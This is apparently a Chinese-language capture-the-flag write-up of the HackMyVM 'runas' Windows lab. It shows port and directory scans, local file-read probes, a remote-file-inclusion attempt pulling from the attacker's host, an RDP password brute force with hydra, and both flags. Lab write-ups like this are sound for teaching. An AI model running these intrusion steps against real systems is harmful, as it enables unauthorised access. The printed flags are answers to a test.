30.runas

1. 基本信息^toc

2. 信息收集

2.1. 端口扫描

┌──(root㉿kali)-[/home/kali/hmv/runas]
└─# fscan -h 192.168.56.20

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
192.168.56.20:139 open
192.168.56.20:135 open
192.168.56.20:80 open
192.168.56.20:445 open
[*] alive ports len is: 4
start vulscan
[*] NetInfo
[*]192.168.56.20
   [->]runas-PC
   [->]192.168.56.20
[*] WebTitle http://192.168.56.20      code:200 len:251    title:Index of /
[*] OsInfo 192.168.56.20        (Windows 7 Professional 7601 Service Pack 1)
已完成 4/4
[*] 扫描结束,耗时: 1.348727278s

┌──(root㉿kali)-[/home/kali/hmv/runas]
└─# nmap 192.168.56.20 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 20:36 CST
Nmap scan report for 192.168.56.20
Host is up (0.00010s latency).
Not shown: 65523 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
5357/tcp  open  wsdapi
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 08:00:27:69:E0:90 (Oracle VirtualBox virtual NIC)

没有域环境

2.2. 网站信息

首页

index.php

styles.css

body {
    font-family: Arial, sans-serif;
    background-color: #f4f4f4;
    margin: 0;
    padding: 0;
}

.container {
    max-width: 600px;
    margin: 50px auto;
    padding: 20px;
    background-color: white;
    border-radius: 8px;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    text-align: center;
}

h1 {
    color: #333;
    margin-bottom: 20px;
}

form {
    margin-bottom: 20px;
}

input[type="text"] {
    width: 80%;
    padding: 10px;
    border: 1px solid #ccc;
    border-radius: 4px;
    margin-right: 10px;
}

button {
    padding: 10px 15px;
    background-color: #28a745;
    color: white;
    border: none;
    border-radius: 4px;
    cursor: pointer;
}

button:hover {
    background-color: #218838;
}

.output {
    margin-top: 20px;
    text-align: left;
}

根据提示可以看出 index.php 应该是会接受一个 file 参数
随便测试几下。看看存不存在任意文件读取

┌──(root㉿kali)-[/home/kali/hmv/runas]
└─# curl 'http://192.168.56.20/index.php?file=C:\Users\Public\desktop.ini'
<!DOCTYPE html>
<html lang="tr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Nothing Here</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <div class="container">
        <h1>There is no going back!</h1>
        <h2>?file=</h2>
        <div class="output">
            <pre></pre>        </div>
    </div>
</body>
</html>

┌──(root㉿kali)-[/home/kali/hmv/runas]
└─# curl http://192.168.56.20/index.php?file=C:\Users\Public\kjdaljdklajls
<!DOCTYPE html>
<html lang="tr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Nothing Here</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <div class="container">
        <h1>There is no going back!</h1>
        <h2>?file=</h2>
        <div class="output">
            File not found!        </div>
    </div>
</body>
</html>

可以发现这个只能判断文件是否存在。

2.3. 目录扫描

┌──(root㉿kali)-[/home/kali/hmv/runas]
└─# dirsearch -u http://192.168.56.20/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/hmv/runas/reports/http_192.168.56.20/__24-11-26_20-50-45.txt

Target: http://192.168.56.20/

[20:50:45] Starting:
[20:50:45] 403 -  199B  - /%C0%AE%C0%AE%C0%AF
[20:50:45] 403 -  199B  - /%3f/
[20:50:45] 403 -  199B  - /%ff
[20:50:45] 403 -  199B  - /.ht_wsr.txt
[20:50:46] 403 -  199B  - /.htaccess.bak1
[20:50:46] 403 -  199B  - /.htaccess.orig
[20:50:46] 403 -  199B  - /.htaccess.save
[20:50:46] 403 -  199B  - /.htaccess_extra
[20:50:46] 403 -  199B  - /.htaccessBAK
[20:50:46] 403 -  199B  - /.htaccessOLD2
[20:50:46] 403 -  199B  - /.htaccess_sc
[20:50:46] 403 -  199B  - /.htm
[20:50:46] 403 -  199B  - /.html
[20:50:46] 403 -  199B  - /.htaccess.sample
[20:50:46] 403 -  199B  - /.htaccess_orig
[20:50:46] 403 -  199B  - /.htaccessOLD
[20:50:46] 403 -  199B  - /.htpasswds
[20:50:46] 403 -  199B  - /.httr-oauth
[20:50:46] 403 -  199B  - /.htpasswd_test
[20:50:52] 403 -  199B  - /cgi-bin/
[20:50:52] 500 -  530B  - /cgi-bin/printenv.pl
[20:50:57] 200 -  414B  - /index.php
[20:50:57] 200 -  414B  - /index.pHp
[20:50:57] 200 -  414B  - /index.php/login/
[20:50:57] 200 -  414B  - /index.php.
[20:50:57] 403 -  199B  - /index.php::$DATA
[20:51:06] 403 -  199B  - /Trace.axd::$DATA
[20:51:08] 403 -  199B  - /web.config::$DATA

扫出来一个登录路径 /index.php/login/
进来还是这个

试一下远程文件包含

http://192.168.56.20/index.php/login/?file=http://192.168.56.6/1.txt


失败了


### 2.4. SMB空会话检测
靶机开放了SMB 的端口 445 与139
```bash
┌──(root㉿kali)-[/home/kali/hmv/runas]
└─# smbmap -u anonymous -H 192.168.56.20

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)

2.4. rdp爆破

除了80 139 445 网站还开放了3389
这是rdp的端口
尝试爆破
用户名字一般都是靶机的名字

┌──(root㉿kali)-[/home/kali/hmv/runas]
└─# hydra -l runas  -P  /usr/share/wordlists/rockyou.txt 192.168.56.20 rdp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-26 21:06:11
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking rdp://192.168.56.20:3389/
[3389][rdp] host: 192.168.56.20   login: runas   password: 123456789
[3389][rdp] host: 192.168.56.20   login: runas   password: password
[3389][rdp] host: 192.168.56.20   login: runas   password: 123456
[3389][rdp] host: 192.168.56.20   login: runas   password: 12345
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-26 21:06:16

看来网址果然是个坑

获取账号密码

[3389][rdp] host: 192.168.56.20   login: runas   password: 123456789
[3389][rdp] host: 192.168.56.20   login: runas   password: password
[3389][rdp] host: 192.168.56.20   login: runas   password: 123456
[3389][rdp] host: 192.168.56.20   login: runas   password: 12345

尝试登录发现都不对
纳尼。 。 。

3. 再试网站

看来还是得从网站入手
我之前读 desktop.ini 回显是空白有可能是因为里面是空的
我直接读flag试试
尝试一下本地读flag

哈哈,成功读取

HMV{User_Flag_Was_A_Bit_Bitter}

在试试root的flag

也可以

HMV{Username_Is_My_Hint}